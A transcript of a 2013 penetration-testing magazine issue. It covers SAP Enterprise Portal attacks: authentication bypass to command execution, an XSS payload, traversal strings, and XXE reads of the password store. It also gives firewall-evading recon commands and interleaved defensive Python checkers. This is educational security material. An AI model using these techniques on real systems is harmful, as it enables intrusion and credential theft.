Pentest Open 08 2013


Transcript of Pentest Open 08 2013

  • Cyber Security Auditing Software

    www.titania.com

Improve your Firewall Auditing. As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

    Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

  • www.titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania's products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

    With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device-specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues.

    Why not see for yourself, evaluate for free at titania.com

Page 4, http://pentestmag.com, OPEN 08/2013

    Editor in Chief: Ewa [email protected]

    Managing Editor: Michael [email protected]

    Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, William F. Slater, III

Beta testers & Proofreaders: Ayo Tayo Balogun, Juan Bidini, Mychael Brown, Elliot Bujan, Massimo Buso, Aidan Carty, Stephanie Castille, Amit Chugh, Gregory Chrysanthou, Amitay Dan, Dan Dieterle, Ewa Duranc, Pinto Elia, Dalibor Filipovic, Pilo Dx, Zbigniew Fiona, Nitin Goplani, Alexander Groisman, Mardian Gunawan, Hani Ragab Hassen, José Luis Herrera, Steve Hodge, David Jardin, Laney Kehel, Kyle Kennedy, David Kosorok, Gilles Lami, Mateo Martinez, Matteo Massaro, Dallas Moore, L. Motz, Michael Munt, Varun Nair, Phil Patrick, Davide Quarta, Sagar Rahalkar, Santosh Kumar Rana, Inaki Rodriguez, Michał Rogaczewski, Tahir Saleem, Robin Schroeder, Tim Singletary, Vinoth Sivasubramanian, David Small, Jeff Smith, Johan Snyman, Craig Thornton, Arnoud Tijssen, John J. Trinckes, Jakub Walczak, John Webb, Steven Wierckx, Lotfi Yassa and others

    Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.

Senior Consultant/Publisher: Paweł Marciniak

    CEO: Ewa Dudzic [email protected]

Production Director: Andrzej Kuca [email protected]

Director: Ireneusz Pogroszewski [email protected]

Ireneusz Pogroszewski

Publisher: Hakin9 Media SK, 02-676 Warsaw, Poland, Postepu 17D; Phone: 1 917 338 3631; www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.

All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

    Dear PenTest Readers,

A long time has passed since we prepared something THAT special for members without a subscription! After long and profound research, we have created a beautiful OPEN issue.

This time we have mainly focused on attack scenarios, as we know that you love them. However, remember - do not hurt anyone!

Most of the included scenarios use BackTrack or Kali Linux. Even though almost everybody knows these tools inside out, we still hope that you will learn a lot of new things.

Articles describe such techniques as bypassing new generation firewalls, taking over an Active Directory and hacking SAP Enterprise Portal. We are certain everyone will find something interesting in this publication.

If you are reading these words right now, you may send us an email with your impressions of this publication. We need some feedback, so we can create more and better issues each time.

    As there is not much to add, we will leave you with this brilliant lecture. Enjoy the reading!

Michael Rogaczewski & PenTest Team


08 Hacking SAP Enterprise Portal, by Dmitry Chastukhin

Business applications have been and will always be the cherished goal of cybercriminals' attacks. Such actions can have many purposes: industrial espionage, the desire to cause financial or reputational losses, sale of critical information. In this article, I would like to tell in detail how a potential attacker can attack one of the most popular modules of the SAP ERP system: SAP Enterprise Portal, and how such attacks can be avoided.

    FROM: PenTest REGULAR 06/2013

16 Common Attack Patterns in Penetration Testing, by Sumit Agarwal

A penetration testing project for assessing overall security of an organization covers testing of various aspects and layers of its security infrastructure. The idea of a pentest is not just to check the existence of controls but to evaluate the sufficiency and appropriateness of these controls.

    FROM: PenTest REGULAR 06/2013

26 Automating POST-Method CSRF Attacks, by Justin Hutchens

Cross-Site Request Forgery is often compared to XSS (Cross-Site Scripting), but really this isn't accurate. XSS exploits a vulnerability on a target server to access, manipulate, and exploit data on the client side.

    FROM: PenTest WEBAPP 01/2013

32 Blackhat Recon With Wireshark, by Lee Alexander King

On unknown networks and black hat testing, Wireshark is a must-have tool to find critical information about your surroundings, infrastructure and potential vulnerabilities. Find out more together with Lee Alexander King.

    FROM: PenTest EXTRA 06/2013

40 Bypassing new generation Firewalls with Meterpreter and SSH Tunnels, by Ignacio Sorribas

In this article we have seen how in some cases the firewall detects malicious code and is capable of blocking the connections, but we have also demonstrated how easy it is to bypass this restriction.

    FROM: PenTest EXTRA 05/2013

48 Taking Over an Active Directory, by Gilad Ofir

As Pentesters and Security Specialists, we often come across a need to secure infrastructure. This need is caused by the fact that our systems are constantly at risk from either internal or external attacks. The attack, which is demonstrated in the article, presents a simple scenario where an attacker does a simple takeover of an Active Directory while using only BackTrack and our knowledge, of course.

    FROM: PenTest EXTRA 03/2013

54 MS Internet Explorer Same ID Property Remote Code Execution Vulnerability, by Praveen Parihar

In this article you will learn about concepts behind Internet Explorer memory corruption, what kinds of bypass techniques are used to launch buffer overflows, heap based and stack overflow attacks and return oriented programming concepts to exploit remote code execution vulnerabilities.

    FROM: PenTest EXTRA 03/2013

    CONTENTS


58 Pass-The-Hash Attacks, by Christopher Ashby

Pass-The-Hash (PTH) is a post exploitation attack technique that is used to obtain user account hashes from either client workstations or domain servers and then use this information to elevate privileges and/or create new authenticated sessions. The technique is used after the attacker has gained access to your environment; special attention to the risk should be raised with regards to protecting yourself against malicious insiders or rogue employees.

    FROM: PenTest EXTRA 02/2013

64 From SQLi in Oracle to Remote Execution, by Jose Selvi

SQL Injection is one of the most common vulnerabilities you can find in webapps. In fact, it is the number 1 vulnerability on the famous OWASP Top 10. As you probably know, SQL Injection can be exploited in order to get all the information stored in a database, but that is not all we can do with this kind of vulnerability. Databases are complex systems and can be configured wrong or be outdated. In this article the author writes about one possible target scenario: a SQL Injection that allows us to execute SQL statements on an Oracle 11g database in order to exploit its vulnerabilities and achieve a complete system pwning.

    FROM: PenTest EXTRA 01/2013

70 How to Detect SQL Injection Vulnerabilities in SOAP, by Francesco Perna and Pietro Minniti

SQL Injections are a well known topic in web application security. So, why another article about that? Because not all the SQL injections are so obvious, and pentesters often look for them only inside the web application GET/POST requests. In this article, the author writes about a real world example, where the automated vulnerability scanner tools failed to detect the SQL injection vulnerability residing inside the SOAP web services code, invoked by an MDI Windows application. Particularly, he describes the vulnerability exploitation phases starting from the detection to the database data acquisition using the commonly available tools.

    FROM: PenTest EXTRA 01/2013


www.uat.edu > 877.UAT.GEEK

[ IT'S IN YOUR DNA ] [ GEEKED AT BIRTH ]

You can talk the talk. Can you walk the walk?

LEARN: Advancing Computer Science, Artificial Life Programming, Digital Media, Digital Video, Enterprise Software Development, Game Art and Animation, Game Design, Game Programming, Human-Computer Interaction, Network Engineering, Network Security, Open Source Technologies, Robotics and Embedded Systems, Serious Game and Simulation, Strategic Technology Development, Technology Forensics, Technology Product Design, Technology Studies, Virtual Modeling and Design, Web and Social Media Technologies

Please see www.uat.edu/fastfacts for the latest information about degree program performance, placement and costs.


Hacking SAP Enterprise Portal

Business applications have been and will always be the cherished goal of cybercriminals' attacks. Such actions can have many purposes: industrial espionage, the desire to cause financial or reputational losses, sale of critical information. As a general rule, all attacks on business applications and systems are targeted, and are performed by quite qualified people.

In this article, I would like to tell in detail how a potential attacker can attack one of the most popular modules of the SAP ERP system: SAP Enterprise Portal, and how such attacks can be avoided.

SAP Enterprise Portal (EP) is the main system entry point for all users in the enterprise network. Portal, as a rule, is used within a company as the place where both public information (including company news, employee data, and so on) and private data (internal documents, instructions, and orders) is stored and processed. Portal is also the place where network users can carry out their duties: edit documents, hold meetings and discussions, manage users, or work with necessary tables.

A distinctive feature of SAP Portal is that it is linked to almost all of the other SAP components deployed in the corporate network, so compromising SAP Portal will lead not only to compromising all of the information it contains, but also to turning it into a kind of springboard for further attacks of the hacker.

It is important to note that access to SAP EP can often be obtained from the Internet. This property of the module dispels the myth that SAP is not accessible from the Internet. For example, using a simple Google Dork, inurl:/irj/portal, you can find a large number of SAP EPs available for connection (Figure 1).

    Figure 1. Accessing EPs from Google

You can also use the Shodan search engine, which can as easily detect available SAP EPs (Figure 2).

    Figure 2. Searching for EPs via Shodan

    Article comes from Pen Test REGULAR.


There is a shortage of 5,00,000 information security professionals in India according to the National Cyber Security Policy, 2013. The Ground Zero Summit, Asia's largest Information Security Summit, promoted by the Information Security Consortium, is the first step towards securing our cyber frontiers.

    Be there, Register Today.

    Prominent speakers presenting at the summit are:

    Keynote Speakers

    Dr. Gulshan Rai, Director, CERT In

    Dr. Nirmaljeet Singh Kalsi, Ministry of Home Affairs, Government of India

    Capt. Raghu Ram, CEO, National Intelligence Grid (Natgrid)

    International Speakers

    Alexander Polyakov, CTO, ERPSCAN

    Enrique Patricio Calot, CEO, Cloodie SA

Filiol Eric, Head of Research, ESIEA CVO LAB

    And many more



    For delegate contact:

    Lokesh Bhardwaj | M: +91 95882 11188, +91 99208 42798 | E: [email protected]



The popularity of SAP EP and its availability on the Internet makes it a desirable entry point for hackers who are choosing the spot to attack companies of various size and industry.

Let's take a look at SAP Portal in more detail.

Architecture

In order to understand specific attacks on SAP EP, you should first look at its architecture, shown in Figure 3. As can be seen on the scheme, the system is based on Web Application Server (SAP J2EE), which provides the context where Portal operates. EP itself is a platform where all kinds of entities operate. The foremost of them are iViews, Applications, web services, and single Components.

    The scheme shows that SAP Portal has links to the database where data is stored, as well as to many other SAP components and models.

    Now that you can picture the basic architectural layout, let us move on to the possible Portal attack vectors.

SAP Portal attacks

SAP NetWeaver J2EE

    Verb Tampering

    Since SAP NetWeaver J2EE is the basis of SAP EP, it is important to understand how an attacker can compromise J2EE. It requires understanding some nuances of how J2EE applications operate.

Access to applications running on J2EE is defined by the developers using the descriptor file called web.xml.

An example of such a descriptor file follows in Listing 1. Let's take a closer look. The most important tags in this file are: servlet-name, defining the name of the servlet; http-method, which defines the HTTP method used to access the servlet; and role-name, which defines the role necessary to access the servlet.

Thus, in order to access the servlet CriticalAction, a user must make a GET request and have the role administrator.

However, authentication can be bypassed in this case. The issue is that, if a user makes a request which is not GET, the user role will not be checked. Developers, as a rule, restrict access to the application for GET and POST methods, but typically forget about the HEAD method, which is similar to GET except for one difference: it does not return the body of the server response. However, if an attacker finds an application that does not require server responses, he may try exploiting this error.

Figure 3. SAP EP architecture

For example, he can use a servlet known as CTC, which requires authentication when using GET and POST methods and allows managing users in SAP Portal: creating, deleting users, moving them from group to group. This is quite suitable for the attacker because in a request to create a user, it is important to send the request rather than to receive the response.

    Thus, using only two requests to SAP Portal, the attacker can gain administrative access to the SAP system:

    Create a new user blabla with a password blbl

    Add the user to the group Administrators

    This type of attack is called Verb Tampering. To secure your system:

Install SAP notes: 1503579, 1616259.

Check all web.xml files. This can be done using the ERPScan WEB.XML Checker utility.

    More details on Verb Tampering are available in Metasploit and ERPScan Pentesting Tool.
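As an added example (not the article's code, and not the ERPScan WEB.XML Checker it mentions), the descriptor checker below embeds a constructed web.xml modelled on the CriticalAction servlet of Listing 1 and flags every security-constraint whose http-method list leaves other verbs, HEAD included, outside the role check; the hardened copy simply drops the http-method element so the constraint covers all verbs.

```python
"""Constructed web.xml checker for the Verb Tampering pattern described
above. Added example: not the article's code and not ERPScan's tool."""
import xml.etree.ElementTree as ET

# Constructed descriptor modelled on Listing 1: the CriticalAction servlet
# is gated by the role administrator, but only when the verb is GET.
WEAK_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical/CriticalAction</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>CriticalAction</web-resource-name>
      <url-pattern>/admin/critical/CriticalAction</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# Hardened form: without an http-method element the constraint applies to
# every verb (HEAD, PUT, ... included), so there is no verb left to tamper.
# On Servlet 3.1 containers <deny-uncovered-http-methods/> gives the same
# effect descriptor-wide.
FIXED_WEB_XML = WEAK_WEB_XML.replace(
    "      <http-method>GET</http-method>\n", "")


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    """Direct children of elem with the given local tag name."""
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    """Stripped text of each direct child named `name`."""
    return [(c.text or "").strip() for c in _children(elem, name)]


def verb_tampering_findings(web_xml_text):
    """Return one finding per web-resource-collection that lists explicit
    http-method elements. Every verb not listed falls outside the
    constraint, which is exactly the gap the HEAD request exploits."""
    root = ET.fromstring(web_xml_text)
    findings = []
    for constraint in root.iter():
        if _local(constraint.tag) != "security-constraint":
            continue
        roles = [r for ac in _children(constraint, "auth-constraint")
                 for r in _texts(ac, "role-name")]
        for wrc in _children(constraint, "web-resource-collection"):
            methods = [m.upper() for m in _texts(wrc, "http-method")]
            if not methods:
                continue  # no verb filter: the constraint covers all methods
            findings.append({
                "url_patterns": _texts(wrc, "url-pattern"),
                "covered_methods": methods,
                "roles": roles,
                "note": "verbs other than %s bypass the role check"
                        % "/".join(methods),
            })
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_WEB_XML), ("fixed", FIXED_WEB_XML)):
        print(label, verb_tampering_findings(text))
```

Run it against every web.xml deployed on the J2EE engine; any finding means a role check that a non-listed verb walks past.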

Invoker Servlet

Let's take a look at web.xml once again (Listing 2).

    Pay attention to another important tag: url-pattern, which describes the URI to access the servlet.

So if a user makes a GET request to the URI /admin/critical/CriticalAction, they will have access to the CriticalAction servlet, if they have the role administrator.

However, an attacker can bypass authentication and access the servlet here as well. The issue is that the InvokerServlet mechanism is enabled in SAP by default, which allows calling servlets by specially formed links. So an attacker can call the servlet CriticalAction by the URI /servlet/com.sap.admin.critical.action and get access having no role, because this URI does not match the one specified in url-pattern.

To attack actual SAP systems, an attacker can again use the CTC servlet. In addition to user control, it allows executing commands in the OS where SAP Portal operates, for example, create user.

    Figure 4 shows the ipconfig command executed on the SAP Portal server.

Listing 1. web.xml descriptor file

CriticalAction com.sap.admin.Critical.Action CriticalAction


    Figure 4. ipconfig command executed on the SAP Portal server

To secure your system:

Install SAP notes: 1467771, 1445998.

Check all web.xml files. This can be done using the ERPScan WEB.XML Checker utility.

Portal Security Zone

Let's move on to possible attacks aimed directly at the Portal. EP has an entity called Security Zone which serves as an additional tool to configure access to Portal programs (iViews).

The zones are defined for each application in the descriptor file portalapp.xml. They have such a critical parameter as Safety Level, which is responsible for the level of access to the application. There are 4 Safety Levels:

No Safety: anonymous users are permitted to access portal components defined in the security zone.

Low Safety: a user must be at least an authenticated portal user to access portal components defined in the security zone.

Medium Safety: a user must be assigned to a particular portal role that is authorized to access portal components defined in the security zone.

High Safety: a user must be assigned to a portal role with higher administrative rights that is authorized to access portal components defined in the security zone.

Developers ought to be very careful when defining Safety Level because it is the only thing which will be checked if a user calls, for example, an iView by direct URL:

    /irj/servlet/prt/portal/prtroot/

In SAP EP, a range of applications was found with Safety Level = No Safety, containing critical functions or vulnerabilities of various kinds.

To secure your system:

Check the Safety Level settings in your applications.

Use SAP guidelines: http://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm and http://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm

XSS

SAP EP is a web application, so it is liable to all vulnerabilities which are characteristic of web applications. One of them is cross-site scripting (XSS). However, in contrast to the classical payload for this kind of attacks, during an attack on Portal an attacker can use the specific features of EP: for example, the EPCF technology which allows accessing user data through a special JavaScript API. An example of such payload:

alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));

    To secure your system: Install SAP notes: 1656549.

Directory traversal

It is yet another classic attack on web applications. Sometimes, however, it has its own special features: for example, directory traversal is not performed by the classic characters /../, but rather by !252f..!252f.

    To secure your system: Install SAP notes: 1630293.

XML External Entity

It is also a classical attack on XML transport web applications. Because XML is one of the main transports in SAP Enterprise Portal, a potential attacker may attempt to compromise the system through it. This section will describe how an attacker can gain administrative access to SAP EP.

Such an attack is based on the fact that SAP has a special password storage called SAP Security Storage, which is located in the file SecStore.properties. Passwords are encrypted, but the key to decrypt them is located in the same directory as the passwords (in the file SecStore.key).

Figure 5. XXE request to Portal as seen in a sniffer

Figure 6. XML found in the XXE request to Portal

So if an attacker is able to read these files, they will be able to decrypt passwords and gain administrative access to Portal.

This attack can be carried out in several stages:

Find a vulnerability that allows you to read files on the SAP Portal server.

Read the file SecStore.properties with encrypted passwords.

Read the file SecStore.key with the key to decrypt passwords.

Decrypt the administrative password and gain access to SAP EP.

Figure 7. Reading files from the SAP Portal server using an XXE vulnerability

The vulnerability to allow reading files from the SAP EP server can be one of the previously described bugs. It can be Directory Traversal or Command Execution. I would like to demonstrate XML eXternal Entity (XXE) separately.

    Figure 5 shows how a typical request to Portal looks in a sniffer.

    You can see a great number of parameters in the POST request, and, if we look closer, we will find XML in one of the parameters (Figure 6).

It is where we will implement the request which will return the content of the files SecStore.properties and SecStore.key.

After the files are successfully read, they can be decrypted with the utility ERPScan SecStore decryptor.

To do this, launch the SecStore_Cr.jar file in the same directory where the passwords and key files received from the server are located, and specify the SID of the system. As a result of its work, the utility displays the decrypted passwords and other service information (Figure 8).

    Figure 8. SecStore_Cr.jar file decrypting passwords and other info

    To secure your system:

Install SAP note 1619539.

Restrict read access to files SecStore.properties and SecStore.key.

Information Disclosure

SAP Portal is shipped with many services, which can be used by hackers to obtain information when planning attacks on the system. However, there may be other vectors of attack development. For example, an attacker could use Portal as the ground for further action. Portal stores a lot of documents, so using a simple internal search mechanism and queries like secret or password, an attacker can learn a lot of confidential information (Figure 9).

Figure 9. Portal's internal search engine shows results for password

To secure your system: restrict read access to important or sensitive information stored in SAP EP.

Conclusion

SAP Enterprise Portal is the most interesting target for hackers who aim to gain access to corporate data because of the popularity of this SAP module. This is why its security undoubtedly requires increased attention to be paid both by system administrators and the developers, and even by common users.

PS: All the vulnerabilities presented in this article have been fixed in cooperation with SAP's Product Security Response Team more than a year ago.

PPS: Not all the possible attacks on SAP EP are described in this article, but all the latest information related to the security of the SAP ERP system is available at http://erpscan.com.

Dmitry Chastukhin, Director of SAP Pentesting Department ([email protected]).


Common Attack Patterns in Penetration Testing

Invincibility lies in the defence; the possibility of victory in the attack

    -Sun Tzu

A penetration testing project for assessing overall security of an organization covers testing of various aspects and layers of its security infrastructure. The idea of a pentest is not just to check the existence of controls but to evaluate the sufficiency and appropriateness of these controls.

It is often observed that multinational companies invest quite a lot in wide-ranging fancy security products without evaluating their appropriateness. These fancy solutions however provide a false sense of security and leave many holes unplugged. A security infrastructure when not aligned with the organization's business needs fails to reap the desired return on investment.

Mostly, the concept of layered defence is misinterpreted as putting a number of security measures one after the other to act as a backup in case one fails. Such plans often cater for multiple failure possibilities but leave out safeguarding multiple entry points. The actual idea of layered defence is implementation of appropriate controls at various vulnerable entry points such that all identified weaknesses are sufficiently safeguarded.

Hence that general is skillful in attack whose opponent does not know what to defend; and he is skillful in defense whose opponent does not know what to attack

    -Sun Tzu

Multi-Pronged Attack Methodology

A multi-pronged attack methodology looks for possible weaknesses at various layers of security. The robustness and efficiency of layered defence is put to test for finding an entry point. Sometimes, it is as easy as finding an unprotected entry point or a security control in its default configuration, but most of the time it requires proper planning and thorough knowledge of the environment to bypass the safeguards and break through.

The model of a multi-pronged attack methodology to penetrate a layered security architecture is depicted in Figure 1.

Attacking ISO 7498-2

Another approach for breaking through a layered security can be thought of keeping the OSI Security architecture reference model (ISO 7498-2) in perspective (Figure 2).

Article comes from Pen Test REGULAR.

Attack Patterns in Penetration Testing

In order to identify weakness and blow holes in a robust security architecture with layered defence, it is important to have complete understanding of the environment.

    A typical penetration testing attack is carried out in three phases (Figure 3).

    Nobody ever defended anything successfully, there is only attack and attack and attack some more.

    - George S. Patton

Pentest Case Study

See Figure 4.

Information Gathering

Information gathering is the most critical and most time consuming phase of the penetration test. This phase prepares the ground for the pentester to launch appropriate scans and exploits at later stages. Any mistake in information gathering or analysis may compromise the complete pentesting assignment. Information gathering involves harvesting of complete information about the target network, platform, and environment.

Figure 1. Multi-pronged attack methodology

Figure 2. Attacking OSI layers

HTTP Banner Grabbing

HTTP headers can provide quite a lot of information about a web server: for example, web server and version, web application, allowed HTTP methods, etc.

    Figure 3. Phases of a Typical PenTest

    Figure 4. Network Diagram of a PenTest Scenario

Listing 1. Using Netcat

nc -v 172.26.1.2 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/html
Content-Location: http://172.26.1.2/MyWebInterface.htm
Last-Modified: Sat, 29 Aug 2013 16:03:16 GMT
Accept-Ranges: bytes
ETag: 9a34bcfd0a023:41a2
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Fri, 13 Sep 2013 22:10:40 GMT
Connection: close


Using netcat: see Listing 1.

Using telnet: see Listing 2.

Mapping the Network (in case of publicly accessible web servers)

Using whois

    whois whois

This will provide information about domain registrar, network range, net-block owner information, and administrator information like name, contact number, and e-mail ids in some cases.

Using nslookup

    nslookup

    This will query DNS Server to obtain IP address mapping and DNS record information.

nslookup -q=mx

This will obtain the MX (Mail Exchange) record information for the particular domain.

Using dig

dig mx

    This will fetch the MX record information of the target domain.

Querying SMTP Server

    telnet 172.26.1.6 25

This will fetch the SMTP banner information.

Internal network topology can be discovered by forwarding an e-mail to a non-existent user in the domain and then analyzing headers of the bounced mail. The header information will reveal IP addresses of servers through the mail path.

Using traceroute

    tracert tracert

This will trace the complete route which a packet traverses to reach the destination. The traceroute information also gives an idea where network devices/routers/firewalls are placed in the path. The total number of hops required to reach the destination is also revealed by traceroute. This information, when analyzed in conjunction with the TTL (Time To Live) information obtained from pinging the target, will help in identifying the operating system of the target host.

    Listing 2. Using Telnet

    telnet 172.26.1.2 80
    Trying 172.26.1.2...
    Connected to 172.26.1.2.
    Escape character is '^]'.
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 1777
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    Set-Cookie: ASPSESSIONIDACBATBQQ=MYAASDJOASRTWD; path=/
    X-Powered-By: ASP.NET
    Date: Fri, 13 Sep 2013 22:10:40 GMT
    Connection: close
    Connection closed by foreign host.

    telnet 172.26.1.2 80
    Trying 172.26.1.2...
    Connected to 172.26.1.2.
    Escape character is '^]'.
    OPTIONS / HTTP/1.0

    HTTP/1.1 200 OK
    Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, SEARCH, POST
    Server: Microsoft-IIS/6.0
    Public: OPTIONS, TRACE, GET, HEAD, PUT, COPY, SEARCH, POST
    X-Powered-By: ASP.NET
    Date: Fri, 13 Sep 2013 22:10:40 GMT
    Connection: close
    Content-Length: 0
    Connection closed by foreign host.
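    The banner and OPTIONS output in Listings 1 and 2 is what a defender should be checking their own servers for. The following script is an added example (not from the article): it parses raw HTTP responses of that shape and flags advertised write or diagnostic methods and version-bearing banner headers; the sample responses are constructed from Listing 2 and a hardened variant of it.

```python
"""Audit raw HTTP responses like the ones captured with netcat/telnet above.
Added example, not the article's code. The two sample responses are
constructed: one reproduces the OPTIONS reply in Listing 2, the other is the
same server with WebDAV/TRACE disabled and the version banner trimmed."""
import re

# Methods a public web server should not advertise unless an application
# needs them: PUT/DELETE/COPY/MOVE/SEARCH/PROPFIND/MKCOL write or enumerate
# content (WebDAV); TRACE echoes the request back (cross-site tracing).
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "COPY", "MOVE", "SEARCH",
                 "PROPFIND", "MKCOL"}
# Headers that commonly leak product versions.
BANNER_HEADERS = ("server", "x-powered-by", "microsoftofficewebserver",
                  "x-aspnet-version")

STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).
    Header names are lower-cased; repeated headers keep every value."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    m = STATUS_LINE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP/1.x status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # tolerate stray lines such as a telnet 'Connection closed' trailer
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return int(m.group(1)), headers, body


def advertised_methods(headers):
    """Union of the methods listed in Allow and Public (IIS sends both)."""
    methods = set()
    for name in ("allow", "public"):
        for value in headers.get(name, []):
            methods.update(t.strip().upper() for t in value.split(",") if t.strip())
    return methods


def audit(raw):
    """Return a list of findings for one response; an empty list means nothing to flag."""
    _, headers, _ = parse_response(raw)
    findings = []
    risky = sorted(advertised_methods(headers) & RISKY_METHODS)
    if risky:
        findings.append("risky methods enabled: " + ", ".join(risky))
    for name in BANNER_HEADERS:
        for value in headers.get(name, []):
            if re.search(r"\d", value):  # a digit means a version is being disclosed
                findings.append("version disclosure in %s: %s" % (name, value))
    return findings


# Constructed from the OPTIONS exchange in Listing 2.
OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, SEARCH, POST\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, PUT, COPY, SEARCH, POST\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Date: Fri, 13 Sep 2013 22:10:40 GMT\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed: the same server after WebDAV/TRACE are disabled and the banner trimmed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, GET, HEAD, POST\r\n"
    "Server: Microsoft-IIS\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("listing 2", OPTIONS_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit(raw) or ["no findings"])
```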


    Host Discovery with nmap

    Scenario 1: Firewall with no Filtering

    pass from any to any

    Nmap Command: nmap -sP 172.26.1.0/29
    Result: All hosts found.

    Scenario 2: Firewall with Generic Rule Set

    pass from any to any proto tcp port 80/25/53
    drop all

    Nmap Command: nmap -sP 172.26.1.0/29
    Result: Still all hosts found (TCP pings for port 80 get through, ICMP packets are blocked).

    Scenario 3: Firewall with Specific Rules

    pass from any to 172.126.1.2 proto tcp port 80
    pass from any to 172.126.1.4 proto tcp port 53
    pass from any to 172.126.1.6 proto tcp port 25
    drop all

    Nmap Command: nmap -sP 172.26.1.0/29
    Result: Only the web server gets detected (the TCP ping for port 80 on 172.126.1.2 gets through).

    Scenario 4: Stateful Firewall with Specific Rules

    pass from any to 172.126.1.2 proto tcp port 80 keep state
    pass from any to 172.126.1.4 proto tcp port 53 keep state
    pass from any to 172.126.1.6 proto tcp port 25 keep state
    drop all

    Nmap Command: nmap -sP 172.26.1.0/29
    Result: No hosts found (ICMP dropped; TCP ACK packets dropped because they are not part of any previously established connection).

    Solution for Scenarios 3 and 4

    Nmap Command: nmap -sP -PS25,53,80 172.26.1.0/29
    Result: 3 hosts found (passes the stateful firewall because the -PS option sets the SYN flag instead of ACK).
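    The four scenarios above come down to one question per probe: does this packet match a pass rule, and if the rule keeps state, does the packet open a flow? The following toy packet-filter model is an added example (not from the article) that replays the four rule sets against the probes the article attributes to -sP (ICMP echo plus a TCP ACK to port 80) and to -PS25,53,80 (a SYN to each port); the host list is constructed from the article's lab, and the 172.126.1.x addresses in the rule listing are read as 172.26.1.x, the /29 that the nmap command scans.

```python
"""Toy model of the article's four host-discovery scenarios (added example,
not the article's code). It shows why `nmap -sP` finds fewer hosts as the
rules tighten, and why `-PS25,53,80` still gets through a stateful filter."""
from dataclasses import dataclass

# Constructed lab: the three servers in the scanned /29, by role.
HOSTS = {"172.26.1.2": "web", "172.26.1.4": "dns", "172.26.1.6": "mail"}


@dataclass(frozen=True)
class Probe:
    dst: str
    proto: str        # "icmp" or "tcp"
    port: int = 0     # tcp destination port
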